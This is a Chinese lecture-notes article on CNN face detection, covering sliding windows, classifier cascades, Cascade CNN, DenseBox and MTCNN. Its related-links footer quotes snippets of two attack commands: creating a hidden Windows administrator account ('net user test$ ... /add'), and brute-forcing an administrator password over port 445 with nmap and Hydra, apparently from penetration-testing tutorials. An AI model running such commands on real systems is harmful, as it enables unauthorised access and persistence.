UVQQQQ

SIGAI深度学习第十集卷积神经网络4

大纲

应用简介
人脸检测
人脸识别
通用目标检测
图像分割
风格迁移
总结

讲述CNN典型应用，主要是在机器视觉领域里边，这是它应用最广的一个领域，包含下边几个应用：人脸识别；人脸检测；通用目标检测；图像分割；风格迁移。

检测、分类、分割基本上已经涵盖了图像理解的整体上要完成的一个目标，我们对所有图像的理解无非就是这三类问题：图像分类（判断一个图像它是什么）、目标检测（找出图像里边所有的目标，包括它的大小和位置）、图像分割（确定每个像素它属于哪一个目标）。

卷积神经网络应用简介

先简单介绍一下CNN的应用情况。它最早是应用在机器视觉/图像领域里边的，更具体来说，是用来做图像分类的，1989年，Yanlecun的第一篇CNN的文章和后边的LeNet5它都是用来做手写字符识别的，就是图像分类问题，后边它逐步地被用到其他领域，包括NLP（比如文本分类、机器翻译等），还有图形学问题（它研究的就是怎样用计算机来画出图像来，尤其是来生成这种比较真实的图像）。其实不要把思维局限在图像这个领域，只要是基于这种空间结构的数据，比如说二维三维甚至更高维的，我们都可以用CNN来对它进行处理，也就是说CNN它最适合处理的就是这种空间结构的数据。

在所有的深度神经网路DNN里边，CNN它是变换种类最多的，各种花样层出不穷，为什么呢？因为他要解决很多的实际问题，针对这些问题，我们要设计专门的一些CNN，比如说做检测、图像分割，如果还用标准的CNN比如说像输入层、卷积层、池化层以及全连接层等这样的网络，你用来做图像分割就不适合了，因为图像分割它要预测输入图像里边每个像素点它所代表的类型是什么，比如说这一块是人这一块是一个自行车，需要把每个像素的类别预测出来，用一个标准的CNN肯定是做不到的，因为它最后的输出就是一个向量值，不能还原出一个每一个像素点它所代表的类别，因此就发明了像全卷积神经网路FCN这样的结构。因此为了解决各种复杂的实际问题设计了一些专门的网络结构，包括损失函数，其实损失函数和网络结构它们两个是密切相关的，很多时候我们的网络结构就决定了我们的损失函数应该定义成什么样子，而我们的损失函数也可以用来指导我们设计出一个什么样的网络来。损失函数实际上是和我们要完成的目标是息息相关的，比如说是要判断每个像素的类别还是要找出图像中所有物体出现的位置和大小等等，根据不同的目标，我们可以设定不同的损失函数。因此理解这些改进的神经网路它的关键点有两个，第一个是要理解网络的结构，这些网络包括哪些层，然后他们的连接关系是什么样子的，每一层它的作用是什么，比如这一层是用来提取特征的下一层是用来做图像放大的等等各种用途，所以说我们要搞清楚每一个层它的输入数据是什么东西输出数据是什么东西，这也是和它的作用密切相关的。第二点就是训练的目标也就是我们的损失函数是怎么构造出来的，前边说了，损失函数的构造，它和网络的结构是密切相关的，它是直接与我们要完成的任务确定的，你确定什么样的问题，就要定义和它相符合的损失函数。

人脸检测简介

人脸检测是标准的目标检测问题，它的目标就是找出人脸在图像里边出现的所有位置和大小，人脸可能出现在图像里边所有的可能位置。但是人脸可能有不同的大小，另外人脸可能有不同的姿态，比如倾斜、旋转等等各种角度，还有它有不同的表情、遮挡等不同的问题存在，因此导致这个问题非常不好解决。其实这也是所有目标检测问题所面临的一个通用的挑战。人脸检测是怎么做的呢？其实可以把它看成一个分类问题二分类问题，就是把所有的地方都找一遍，就是从左往右从上往下用一个固定大小的区域把它框出来，就像用一个放大镜一样，把某一块裁出来看一下是否是人脸，因此就是回答一个Yes或No的问题即二分类问题，这其实是一种暴力破解的方式，找到所有可能的位置，找到了位置以后接下来就是一个二分类问题，回答这个区域它是人脸还是不是人脸，做这样一个判断。人脸检测，它是整个机器视觉里边非常重要的一个问题，因为它有一个强的使用价值，另外它学术研究的价值也非常强，而且相对于其他的一些目标检测来说它还是算简单一些的了，比如说行人检测，它是更复杂的，因为行人的姿态变化各种情况会更多一些遮挡会更多一些，而人脸算简单一些的问题。而人脸在我们很多场景里边会经常出现的，因为日常生活中非常关心人的脸这样一个问题，因此它非常重要。

实际上CNN在1990年代就用来做人脸检测了，但是长期以来没有得到一个很大的突破，第一次真正意义上的突破是在200年的时候，VJ提出的一个用人工特征（准确的说是Haar特征）+级联的Adaboost分类器+滑动窗口（即从左往右从上往下滑，依次找这个固定大小区域里边它是人脸还是不是人脸）的方案，这是人脸检测历史上第一次有里程碑意义的突破，这个框架后来就是长时间被工业界和学术界所用的，它的优点就是用这种级联的AdaBoost分类器方案，它非常省时间，它的原理就是用多个分类器联合判断这个区域是人脸函数不是人脸。因为人脸在图像里面出现它是一个很稀疏的小概率事件，就是出现的概率非常小，因此我们用一个非常简单的分类器，把大部分一看就不是人脸的区域给排除掉，这样就能减少工作量，因为人肉眼一瞥，瞥一眼就能看出这不是人脸，就不用细看了，这样就把大部分不是人脸的东西给筛掉了，最后能留下来的这些区域，在接下来再做一次判断，用第二级分类器来判断，第二级分类器比第一级更精细一些更准确一些，如果通过的话就接着往下走，一直到通过了所有级的分类器以后，就判定为是一个人脸，否则被任意一级分类器丢掉了，都认为不是人脸，它就是这样做的，这就是分类器级联的方案。这种方法看上去很简单，但是它极大的提高了人脸检测的速度，因为我们如果要采用这种暴力破解的方式滑窗、缩放图像、固定窗口大小的方式来判断是否是人脸，用这种滑动窗口的技术做人脸检测，运算量是相当大的，速度是非常慢的，而VJ框架这种方法很巧妙的用一些简单的分类器把大部分不是人脸的区域给排除掉了，这样就大大节约了时间、精度也非常高，比之间的方法要好一些，因此它被得到大规模的使用，以前数码相机人脸对焦都是使用这种VJ框架实现的。人脸检测，它有两个指标，它和所有的目标检测问题是一样的，第一个检测率，就是算法它检测出来的数据Nd比上真实的目标数N，误报率就是被错误的判断为人脸数除以负样本的总数即不是人脸的所有的区域。我们要追求的目标是检测率要高误报率要低，另外还有速度上的要求，就是算法要尽量的快。

人脸而分类器

前边已经说了，最终是把问题转化为一个二分类问题，就是用一个固定大小的窗口去框区域，把一个区域裁出来判断它是人脸还是不是人脸，这是怎么做的呢？

这就需要我们训练一个分类器用于判断一个固定大小的区域它是否是人脸，怎么训练的呢？就是用大量人脸的正样本比如十万个人脸和一千万个非人脸的这样的样本来训练二分类模型，得到这样一个模型以后，接下来给一张图像以后，我们就可以判断它是人脸还是不是人脸，这就是一个整体的思路。

滑动窗口技术

滑动窗口技术是怎么做的呢？

因为我们要找出所有的人脸，它可能出现在所有的位置上，那么我们就用一个固定大小的窗口，比如说64*64像素的，在图像上面滑，从左往右从上往下，然后来判断框住这快区域它是人脸还是不是人脸，这是一个二分类问题，前边说了，我们训练一个二分类器就可以解决这个问题，这是解决了找人脸的所有位置的问题，但是还有一个问题没有解决，就是要检测不同大小的人脸，比如近大远小，一般是训练一个能检测最小的人脸的分类器，比如说64*64像素的人脸分类器，只能判断64*64大小的人脸，如果想判断更大的人脸，只需缩放即可用该分类器判断，这就是图像的金字塔技术，就是把图像反复的缩小，比如说把图像缩小以一定的比例缩小，如1.1，不断地除以1.1，反复缩小图像，这样就把图像中大的人脸经过很多级缩小以后缩成小的人脸，这样就能用64*64的窗口把它检测出来，金字塔技术加上滑动窗口技术方案。

我们的原始的检测结果会是什么样子呢？它在人脸区域周围检测出很多框出来，它都把这些地方来判断为人脸，因为这些地方都是人脸，只是偏了几个像素而已。最后还要做一个非最大抑制，合并去重，把属于同一个人脸的这些矩形给合并掉，合并掉以后就只剩下一个干净的矩形框来表示这个人脸，这就叫非最大抑制NMS。

分类器级联

分类器级联主要来解决速度问题，即计算量太大而达不到实时的问题。由于人脸在图像中出现是一个小概率事件，用简单分类器快速把不是人脸的大部分窗口排除掉，这就能简化我们的计算过程，级联的分类器就是这样做的。判断每一个窗口它是人脸还是不是人脸的时候，它不是用一个二分类器来判断Yes还是No，而是用了很多个分类器集合起来使用的。第一个分类器它非常简单，比如只用一个if-else就可以判断出它是否是人脸来，如果通过了就用第二个分类器来更细致的判断它是否是人脸，第二个分类器可能比第一个复杂点，但是它准确率会更高一些，如果判断不是人脸，就排除掉了，不做其他的判断不再劳烦其他的分类器了，如果通过了再用接下来的分类器判断层层把关，如果所有分类器都认为是人脸的话，最后输出True，被任意一个分类器否定掉就认为不是人脸。它的核心是分类器复杂程度递增，从而不是上来就用复杂分类器来判断，因此就大大的提高了我们的检测效率。

Cascade CNN简介

分类器级联（cascade分类器）以及滑动窗口（sleding window）技术最开始是被adaboost所使用的，人工特征（Haar特征）+AdaBoost集成起来用的，前边讲深度学习概念的时候说了，这种人工设计的特征，它的描述能力是非常有限的，因为它计算非常简单，限定了我们算法所要达到的精度了，因此我们就必须把它干掉，用CNN来自动提取特征。问题又来了，如果是手工提取的，如Haar特征加上AdaBoost，我们可以把各种级联的分类器做的非常简单，比如第一级用一个if-else就可以判断出来了，而CNN，就算是再小，它也要经过卷积、池化、全连接等等一系列运算，还是相当复杂的，因此直接用CNN来做cascade级联的话，其实面临一个速度上的问题，就是它的速度比我们的AdaBoost+Haar/HoG特征这样的更慢一些，因此直接的用CNN来暴力的这样做的话肯定是不行的，所以说它也要采用这种级联的分类器来做，就是用多个CNN来做，第一个CNN1，计算量小，用来排除那些一看就不是人脸的区域，通过CNN1后再送到第二个CNN2，又把大部分排除掉了，再送到第三个网络CNN3中去，CNN3可能又把大部分排除了，如果CNN3认为是人脸了，那最终就判定为是人脸。但是它也是级联，在速度比Haar+Adaboost这样的方案慢很多，主要原因是它采用了滑动窗口暴力破解技术，要检测所有的位置和所有大小的图像。

第一篇CNN+滑动窗口技术来解决人脸分类问题的是2015年的一篇文章：

Haoxiang Li, Zhe Lin, Xiaohui Shen, Jonathan Brandt, Gang Hua. A convolutional neural network cascade for face detection. 2015, computer vision and pattern recognition.

这篇文章采用了3级卷积网络，CNN1、CNN2、CNN3联合起来检测，CNN1最简单，后边的越复杂，接收的图像尺寸也是不一样的，第一个接收的是一个非常小的图像的输入，第二个可能会大一点，第三个会更大一些。

第一级网络结构简单，计算量小，用于快速排除大量的非人脸窗口。如果窗口图像通过了所有3级网络，则被认为是人脸。

这篇文章有一个创新之处，它除了判断图像是否是人脸外，它还训练了另外一组神经网路，做位置矫正的，做滑窗找出的人脸位置可能不是很正稍偏，大小、位置都有点偏，校正把位置调到真正的人脸上去。

接下来看它的整体结构。

检测算法的流程

经过三次检测、三次校准、三级最大抑制。

检测网络的结构

检测网络用于区分候选区域即窗口图像是人脸还是背景，是一个二分类器网络。

这里有三级网络，分别接收12*12的输入、24*24的输入、48*48的输入，它们的输入都是RGB图像，大图像进行缩放输入判断就可以了，这三个CNN，一个比一个复杂，第一个最简单，有一个卷积层，是16个3*3的三通道卷积核，接着是3*3的池化层，然后接了一个全连接层，最后是输出层，输出结果是人脸还是不是人脸的概率分别是多大。第三个稍微复杂一点，有两个卷积层、两个池化层、还有归一化层、最后是全连接层，这里它采用了一个技巧就是提取这个图像在多尺度上的信息，因为人脸它缩放到不同的大小的时候它所提取出来的信息是不一样的，因此这个网络它除了把48*48图像通过上边这些层处理以后，还把48*48的图像缩放到24*24的大小，然后接了一个24*24网络结构，把它的全连接层和48*48的全连接层拼接起来形成一个更长的一个向量，最后送到输出层里边去输出一下，得到是人脸还是不是人脸的概率有多大。

校准网络的结构

说完了检测网络，接下来说校准网络它是怎么做的，它是把所有可能的校准分成了45种情况，比如下图将红色框校准成蓝色框，他要做平移、高度宽度调整一下。45种情况包括向左调、向右调、宽度缩小、宽度放大等等。

这个网络接收的输入是偏离的人脸图像也可能是正的，输出是正的人脸图像，它也有三级，分别接收12*12、24*24、48*48的输入图像，这些输入图像都可能是偏的，最后根据这些图像算出来一个结果，就是要把它往哪个方向去调。

看它是怎么调怎么校准的？

校准方式：

前边的是那些x、y是偏了的人脸坐标，w、h是偏了的矩形框的宽度和高度，算出来以后的结果是校正后的x、y、w、h，xn、yn、sn都代表着校正方式，xn表示在x方向平移多少个像素，yn表示在y方向平移多少个像素，sn表示它的尺度是缩小一点还是放大一点，xn、yn、sn这三个参数组合起来一共有45种情况，xn、yn各三种情况，sn有15种情况，这三个参数采用离散值量化，组合起来有45种校正情况。

校正网络要根据输入图像判断应该用这45种方式中的哪一种进行校正，这是一个多分类问题。由于各种校正情况之间并不严格互斥，为了提高精度采用了取平均的方式，比如按第一种方式调整之后乘以0.9概率值，第二种调整方式调整之后乘以0.1概率值，把结果叠加起来得到最后的一个调整结果。

训练算法的流程

前边已经说了整个网络的结构，包括检测时候的算法的流程，接下来我们回答最后一个问题：这个网络它是怎么训练出来的？

训练时需要解决对3个检测网络及3个校准网络的训练，检测网络好说，就拿正样本人脸、负样本不是人脸来训练就可以了，关键是校准网络它的样本怎么生成一会再说。另外还要确定两级级联阈值，因为第一级网络它判定为是人脸还是不是人脸以后，还要对它的结果做一个稍微的调整以便送到第二级里边去处理，不是说它判定为不是人脸就把它丢掉，它有个概率值的，就是这个级联阈值，这个和AdaBoost级联阈值一回事，就是把分类器F(x)的输出结果加上Σ再来判定一下。

首先说检测网络是怎么训练的，检测网络非常简单，它和我们之前的AdaBoost级联分类器的训练是一样的，它是采用每一级分别进行训练的，它是把人脸图像作为正样本，正样本是从AFLW中取出来的样本标注好位置把它裁出来作为正样本，把一些背景图像作为负样本来训练每一级分类器。注意这三级检测网络，它的正样本都是从AFLW中做出来的正样本，负样本是有所不同的，负样本是怎么做的呢？第一级的负样本很简单，就拿所有背景图像做负样本来训练所有AFLW样本为正样本来训练，训练完以后，紧接着要确定一个阈值，这个阈值是怎么确定的呢？就是要保证正样本有99%的检测率，把三级网络对于所有正样本的预测输出结果即是人脸的概率按照从大到小进行排序，前99%都要通过即大于这个阈值就判断为是人脸，注意训练之前要把所有的图像缩放到12*12的大小送到CNN里面去训练，正样本是整个AFLW里边的样本，负样本是从背景图像里边随机选出来的20万张样本，这样我们就把第一个网络训练出来了，并把级联阈值给算出来了（即卡到99%时的值就设定为阈值）。

紧接着训练第2级检测网络，怎么训练呢？还是拿所有的AFLW的样本作为正样本，负样本是有讲究的，它这时候是怎么收集负样本的呢？它是先拿第一级检测网络和校正网络对背景进行扫描，把被第一级网络判定为人脸的那些背景作为负样本来训第二级检测网络，这和AdaBoost类似，重点关注前边分类器错判的那些样本，这时候所有的样本都要缩放到24*24的大小训练第2级网络。训练好之后，用同样的方式确定它的级联阈值，保证它有97%的检测率，即把所有的正样本按照它的预测结果概率p从大到小排序在97%的位置，预测结果小于该阈值的则认为不是人脸，大于该阈值的认为是人脸。

紧接着再训练第3级检测网络，它是把第2级检测网络和校准网络找出来那些不是人脸的虚景背景图像拿来做负样本来训练。说完检测网络的训练，再来说一下校准网络，校准网络它的训练样本是偏了的人脸图像，就拿AFLW人脸按45种方式随机扰动一下，截一个偏一点的人脸图像作为样本，拿到网络里边来训练，这样就把我们的校正网络给训练出来了。

到这里为止，我们就完成了整个网络的训练，注意它的检测网络是一级一级这样训练的，然后每一级是重点关注被前一级错判的那些样本即虚景做负样本，然后校准网络是用随机扰动的那些样本来训练的，阈值是通过卡检测率如99%通过正样本来找出它多大。

检测结果

cascade CNN在FDDB上边的检测结果，官网上的ROC曲线，cascade CNN它的ROC曲线是比之前的AdaBoost这样的算法的ROC曲线高了很多、性能改善是非常明显的，作者给出了一些例子就是在这些图像的检测效果，图像模糊、有遮挡、各种复杂姿态，这个比之前的人工特征+AdaBoost那套算法要强太多太多了。

DenseBox简介

Lichao Huang, Yi Yang, Yafeng Deng, Yinan Yu. DenseBox: Unifying Landmark Localization with End to End Object Detection. 2015, arXiv: Computer Vision and Pattern Recognition.

使用全卷积网络，在同一个网络中直接预测目标矩形框和目标类别置信度，通过在检测的同时进行关键点定位，进一步提高了检测精度。

上面介绍完了CascadeCNN，接下来介绍第二种算法叫DenseBox，这里是百度在2015年提出来的，当时的效果是非常好的。

CascadeCNN还是采用的滑动窗口的技术，即用一个小窗口从左往右从上往下滑，卷积神经网络作用于这个小窗口图像。然后判断这一块图像它是人脸还是不是人脸，就回答一个yes或no问题。这个运算量是非常大的，因为我们的卷积神经网络要从左往右从上往下依次滑，而且还要把图像缩成不同的尺寸都去这样过一遍，这个运算量的大的惊人。CNN每次只运行在这个小窗口区域对这一块进行计算，判断这个窗口它是人脸还是不是人脸。能不能让神经网络作用于整张图像，因为CNN我们可以用gpu来进行并行加速的，前面讲CNN原理的时候已经讲过了，他最后把对整张图像的卷积运算转换成矩阵乘法kx->y，y外就是卷积输出的特征图像featuremap，这个矩阵运算是非常好并行化的，也就是把所有的位置的卷积同时把它做了，所以说如果能对整张图像一次卷积的话是最好的，这是第一个点。

第二个点是前面这种滑动窗口的方案他其实是有很多重复的计算的，比如每次窗口滑动时的交叠区域他的卷积就可能被计算多次，因此这里边大量的重复计算存在，因此说我们就在想，如果能用卷积神经网络通过一次卷积直接把所有位置上是人脸的概率给找出来就好了，这显然是可以达到的，因为我们卷积以后输出的是一个特征图像faturemapFM，FM中的一点代表以该点为中心映射回去，原始图像里边某一块区域他所有的信息都被卷到这一点里面了，原始图像通过多级卷积以后图像FM中一点的感受野是非常大的一片区域，因此我们把图像经过多次卷积和池化变得很小的时候，比如说，512×512的输入图像，最后卷积成32×32的时候，它里边每一个像素点对应512×512图像里边一片很大的区域。

我们想，可以用CNN输出32×32FM中每一点处对应回去512×512处一点以该点为中心的一片区域有人脸出现的概率。DenseBox以及后边要讲的SSD等目标检测算法，他就是这样做的。DenseBox它就是用一个全卷积网络，可以认为这个网络没有全连接层，最后输出的就是一个featuremap的一个图像，这个图像里的每一点，就代表以这点为中心的对应回去的原始图像里面一块大区域它是人脸的概率值，就是他最后得到的这张预测图，它就包含了所有该图一点映射到原图对应区域他是否是人脸的概率以及还包含了一些位置信息、不同宽高比(即FM中该点映射到哪一块区域裁才多大区域出来，以及宽高比是多少呢这是不一定的，即x,y,w,h)，这是DenseBox他核心的做法。

这代表着两种不同的流派思想，第一种是CascadeCNN的，这种以滑动窗口为基础的CNN，他的卷积每次作用与图像里边每个小窗口，对该小窗口判断，他是人脸还是不是人脸，第二种就是DenseBox这种的，直接输出一张图像，即对原图像进行一次卷积，输出一张小图像，这张小图像代表原始图像里面每个位置上出现人脸的概率有多少，就是直接把人脸的位置和大小给算出来了，还有他出现的概率给出来了。这是篇论文它还有一个特点是他在做人脸检测的时候，他还做了人脸的关键点定位，这样可以进一步提高检测效率，这也不是什么新的做法了，在之前的文章，比如说JDA，有兴趣可以看一下，这是用AdaBoost做的，它就是同时做人脸检测，就是把人脸框出来，还包括它眼睛的中心鼻尖还有嘴角这五个关键点的定位同时给做了，这同时有利于提高我们检测精度的，因为你要检测这块区域是不是人脸的话，那可以看他这几个那关键点，如果这几个关键点有的话，它可能是个人，如果没有的话就不是个人，所以说人脸的关键点定位和人脸的检测它是相辅相成的，两个综合起来的话是能提高检测的效率的，而这种做法在后面的另一篇文章像MTCNN里面也是有体现的。

检测算法的流程

面来看，DenseBox它的检测流程，他首先是对图像做了金字塔缩放。原始图像，按照一定的比例反复把它缩小，得到一些比较小的图像，然后分别把这些图像送到卷积网络里面去处理，这样是为了检测所有不同大小尺寸的人脸，经过一些卷积和池化以后，接下来她做了一个上采样操作，这是因为通过很多层卷积和池化以后，图片会缩的非常小，他做了一个上采样又把图像给变大了，得到一张大一点的图像在这里，然后这张图像又包含了每一点处对应原图像区域出现人脸的概率有多大，以及如果这个人脸出现了的话，他的位置是怎样即该矩阵框它的位置和大小(x,y,w,h)，因此后面通过反卷及实现上采样得到的结果图像里边就已经蕴含了任何一个位置上面是否出现目标及出现目标的概率p以及这个目标的位置信息，这样就可以检测出来图像中任何一个地方的人脸。

加上我们对图像做了金字塔缩放，把各个尺度图像分别拿进来进行处理，这样就可以检测不同大小的人脸，这样既解决了人脸的大小问题，又解决了人脸出现在任何一个位置上的问题，因为每个位置他都预测了一个概率，而且还预测出这个位置上面他的人脸如果出现的话，它的矩形框应该在什么地方，做完以后，就得到了很多人脸的候选框，就可以做一个阈值化，这个阈值化就是为了得到候选框而用的，因为我们输出的是一张概率图，实际上不是一张直接的位置(x,y,w,h)，而是他们的调整值。

那我们就可以根据这个概率图经过阈值化，就得到所有的人脸，只要这个判定为人脸的概率大于阈值，我们就把这个地方判断为人脸，除了一张概率图外，他还生成另外四张图，分别表示人脸的矩形框w,x,x,y，那就结合这个概率，如果这个概率超过某个值的话，就把该区域对应的另外四个通道图像取出来，把矩形框计算出来，这样得到一些候选框，最后做一个非最大抑制就能得到最后的结果了。

总结一下DenseBox，他的检测流程，其实和后边讲的YOLO、SSD系列是非常像的，他是直接得到目标图像的矩形框，他是怎么做到的呢？他为了检测不同大小的人脸，他把图像做金字塔缩放，分别把每个尺寸头像缩放以后的图像和原始图像分别送到CNN里面去处理，经过一些卷积和池化操作以后，再经过上采样，得到一个输出图像，这个输出图像他有五个通道，其中一个通道，它里边的每一个像素点表示这一点出现目标的概率，对应就是原始图像里面以某一点为中心的区域出现人脸的概率有多大，另外四个通道表示如果这个地方是人脸的话，它的矩形框应该是在什么位置上边x,yz,w,h这些参数，当然，这些参数不是通过回归值直接回归出来的，而是通过一个调整值调整出来的，他预测的是一个调整值。这样就解决了在图像的任何一个地方都出现人脸的这样一个问题，前面的检测不同大小的人脸也出来了，概率图就是来做判断的二分类表示这个地方是人脸还是不是练的概率，而另外四个通道表示了这个人脸在什么地方即w,h,x,y。这相当于做了一个分类和回归，分类就是二分类，表示任何一点处出现人脸的概率，回归就是回归了矩形框的值x,y,w,h他的坐标。

网络结构

前面我们说完了检测的流程，接下来就收一下它的网络结构。前面说了，他有卷积层、池化层，由VGGNet那样的网络改进的，做完卷积、池化之后，他做了一个上采样，他把前面的那些卷积层结果串起来，把不同尺度上的卷积层结果串起来，为了多分辨的特征提取，这种思路前面已经讲述过了，在CascadeCNN的时候，他也把两个不同大小的卷积网络结果图像拼接起来形成一个大的特征向量。

总之，就是作一些卷积、池化以后再做一次上采样把图像变大一些，得到一张尺寸稍放稍为稍微大一些的卷积图像，对这个图像我们做了两个分支。第一个分支是用来输出任何一点处它出现一个目标的概率值，就是检测。另一个分支是预测，如果这个位置是人脸的话，他的矩形框框在什么地方即x,y,w,h这四个参数，这样的话，它对应的输出图像就是五个通道的图像，第一个通道是概率p，后面四个通道分别表示x,y,w,h，这些坐标以及矩形框的尺寸等这些信息。

相应的，他的输出层有两个分支的话，那损失函数求两个部分构成，第一个部分是分类损失，就是判断任何一点处有没有目标的概率值损失，第二个是目标矩形框的回归损失，要预测这个位置它如果有目标出现的话它的矩形框应该在什么地方，然后训练的时候，这个地方它也会产生一个损失，因此他是使用了一个多目标的损失函数，等会再细讲。

网络的输出数据与损失函数

卷积网络的输出数据：

详细介绍一下，DenseBox这个网络的输出结果，前面我们已经说了，他是去掉了全连接层，他就是经过一些卷积和池化以后，做了一个上采样操作，然后接了两个分支出来，这两个分支接下来进行的也是一些卷积操作，最后得到两组输出的卷积特征图像，一组代表了每个位置上出现一个目标的概率，另外一组他有四个通道，代表如果这个位置上出现一个目标的话，它的矩形框的宽高和位置在什么地方，那么我们就来说他输出的结果，两个分支共输出五个通道的图像，其中有一个通道是置信度得分，代表每个位置是人脸的概率，另外一个分支输出的是四个位置结果w,h,x,y。整个卷积网络，它如果接受m×n的输入图像的话，因为他是一个全卷积网络，所以说他可以接受任意大小的一个输入图像，这个我们后面在讲SPPnet和fastRCN的时候会说的。

我们干掉了全连接层以后，可以保证我们的网络它可以输入任意大小的图像，都可以对他做一些卷积和池化，输出一个和输入图像大小相关的一个输出图像，它的尺寸和输入图像是有关的，比如说把他缩小4倍。这里卷积网络接受m×的输入图像，刚好产生5通道的m/4×n/4输出图像。假设原图像中目标矩形左上角的坐标为(xt, yt)，右下角的坐标为(xb, yb)，输出图像中位于点(xi, yi)处的像素用5维向量描述了一个目标的矩形框和置信度，第一个分量是候选框是一个目标的置信度，后边4项分别为本像素的位置与矩形框左上角、右下角的距离，该5维向量的计算公式：

损失函数：

输出层有两个分支，因此损失函数由两部分组成。

第一部分输出值为分类置信度即本位置是一个目标的概率，分类损失函数采用欧氏距离

第二部分是矩形框预测误差

总损失函数是这两部分的加权和，这样给定一个训练样本的话，我们可以把这两部分损失给算出来。

训练样本的标注方案为，对于图像的任何一个位置，如果它和真实目标矩形框的重叠比大于指定阈值，则标注为1，否则标注为0；对位置的标注根据每个像素与目标矩形框4条边的距离计算。

这种多目标的损失函数，等会在讲fastRCNN、fasterRCNN、YOLO、SSD等等还有一系列人脸识别的算法里边经常会用到这样一种思想，同一种神经网路它要完成几种不同的任务，第一个是做分类，判断每个位置上是不是有目标，如果该位置有目标还要预测目标的位置，因此它有两个任务，合起来就构造出了这样一个多任务的损失函数。

MTCNN简介

下面介绍第三种人脸检测算法，叫MT-CNN即多任务CNN，multi-task CNN，因为他同时把图像中人脸给检测出来了，还把人脸的几个关键点给找出来了，所以说它叫多任务的神经网络。它融合了人脸检测和关键点定位这两个功能，就是在一个网络里面同时完成这两个功能。

这个算法它是怎么做的呢？她抛弃了CascadeCNN那种滑动的思想，即不需要滑窗，但是他还是使用那种级联即Cascade那种思想。也就是说先用一个模型来初步的预测一下，然后再用一个模型细化它，一步步反复这样做，但是他也是用了三级，然后呢，他没有滑窗它怎么做的呢？他也是像DenseBox一样，它是用一个卷积网络一样，直接预测出一个位置数人脸的概率值，以及关键点的坐标。他整个系统用了三个网络构成，即ProposalNet(提取一些候选区，可以认为是一个粗略的筛选，就是把一次是人脸的地方找出来)、RefinementNet(求精的细化网络，比它更复杂的一个网络)、OutputNet(输出网络)。

检测时，使用这3个网络进行级联，即第一个网络的处理结果交给第二个网络处理，第二网络处理完了，交给第三个网络处理，这就有点像前面那个CascadeCNN(CascadeCNN是用了3个尺寸不一样的神经网路合成来完成这样一个检测任务)。

它检测的时候怎么做的呢？首先用ProposalNet输出候选，人脸关键点，这是一个粗略的结果，不准确，这个网络，它是一个全卷积的网络，和DenseBox一样，他就直接输出了一个很小的图像比如缩小到四分之一或八分之一，图像中每一个像素点代表了原始图像里面对应区域出现人脸的概率有多大，以及它如果是人脸的话，他的人脸的关键点坐标是多少，这里它抛弃了用滑动窗口的方案会更快一些，像DenseBox一样。接下来用RefinementNet对ProposalNet的结果重新细化，抛弃了非人脸窗口，只对前面提出的人脸窗口(即检测出来一次是人脸的窗口)进行处理，然后呢，同样也得到一些矩形框的位置及关键点的坐标，并执行了一次非最大抑制。

接下来再送到最后一个网络OutputNet里面进行处理，然后他又在上一步的网络里面进一步的细化，最后得到了矩形框的回归值，即每个人脸矩形框的位置和大小及关键点的准确值，这样就产生了我们最后的检测结果。

Kaipeng Zhang, Zhanpeng Zhang, Zhifeng Li, Yu Qiao. Joint Face Detection and Alignment Using Multitask Cascaded Convolutional Networks. 2016.

检测算法的流程

你可能感兴趣的:(SIGAI深度学习第十集卷积神经网络4)

g711a/g711u音频播放器和原始音频参考文件 sunflavor g711 音视频
g711ag711u测试数据，g711播放器下载,调试声音时很不方便，下载附件包后，你要的都有了。下载地址：https://download.csdn.net/download/sunflavor/88603724
智能合约安全审计平台——以太坊虚拟机安全沙箱闲人编程智能合约安全区块链安全沙箱隔离层以太坊 EVM
目录以太坊虚拟机安全沙箱——理论、设计与实战1.引言2.理论背景与安全原理2.1以太坊虚拟机（EVM）概述2.2安全沙箱的基本概念2.3安全证明与形式化验证3.系统架构与模块设计3.1模块功能说明3.2模块之间的数据流与安全性4.安全性与密码学考量4.1密码学保障在沙箱中的应用4.2防御策略与安全规范5.实战演示与GUI设计5.1设计目标5.2GUI模块设计5.3数学公式与数据展示6.沙箱模拟运行
windows隐藏与克隆账号进击的木头渗透 windows隐藏用户
1.使用命令提示符建立简单的隐藏用户点击“开始”→“运行”，输入“CMD”运行“命令提示符”，输入“netusertest$123456/add”，回车，成功后会显示“命令成功完成”。接着输入“netlocalgroupadministratorstest$/add”回车，这样我们就利用“命令提示符”成功得建立了一个用户名为“test$”，密码为“123456”的简单“隐藏账户”,并且把该隐藏账户
通达信强势突破战法：百战百成量价齐升+均线多头擒牛指标幅图指标 q125500612 通达信指标通达信指标
指标用法详解核心逻辑该指标旨在筛选强势突破+量价齐升+趋势向上的个股，适用于短线或波段交易策略。一、趋势判断条件均线系统股价开盘低于20日/40日/60日均线（短期调整后蓄势）收盘价突破20/40/60日均线的最高值（确认趋势反转）5/10/30/60/120日均线呈多头排列（开盘在最低均线下，收盘站上最高均线，代表短期强势）EXPMA趋势强化股价站稳50日EXPMA（指数平滑均线）上方50日EX
十八、windows系统安全---利用Hydra获得账号密码 midsummer_woo Windows 系统安全安全 windows
环境靶机：windowsserver2012攻击机：kalilinux靶机环境密码为弱口令设定登录失败的次数锁定用户账号，关闭密码复杂度步骤1.在kali上探测目标主机（可在目标主机通过ipconfig查看目标主机IP）是否开启445端口nmap192.168.99.105-p4452.使用hydra对已知的administrator账号进行爆破（注意pass.txt的路径）hydra-ladmi
人们开始向 AI 倾诉, Claude 正变成 “树洞“ Code Agent AI Agent 人工智能
大家好,这里是CodeAgent.当AI不再只是生产力工具,它还能成为情绪的出口吗？──────Start──────今天看到一篇有趣的文章,讲的是:Anthropic分享了Claude用户如何与AI展开深层情感对话的真实情况.他们通过匿名化系统Clio,分析了450万次ClaudeFree与Pro用户的真实对话.主要集中在下面几个方面：心理咨询（Counseling）生活建议（Advice）情绪
Windows Server 2012-等保三级基线 DK_Allen 安全 windows 安全
一、身份鉴别1.1、应对登录的用户进行身份标识和鉴别，身份标识具有唯一性，身份鉴别信息具有复杂度要求并定期更换描述检查是否创建了除默认管理员之外的普通用户账户；是否启用密码复杂性配置，密码最小长度设置为8以上；以及是否设置密码使用期限策略，最长使用期限设置为30-180之间，最短使用期限设置为1-14之间；是否将强制密码历史设置为5-24之间；启用自动登陆策略为已禁用；无克隆帐户。检查提示--加固
一文搞懂JS中数组与对象的几种循环方式前端没钱前端基础与进阶 javascript 开发语言 ecmascript
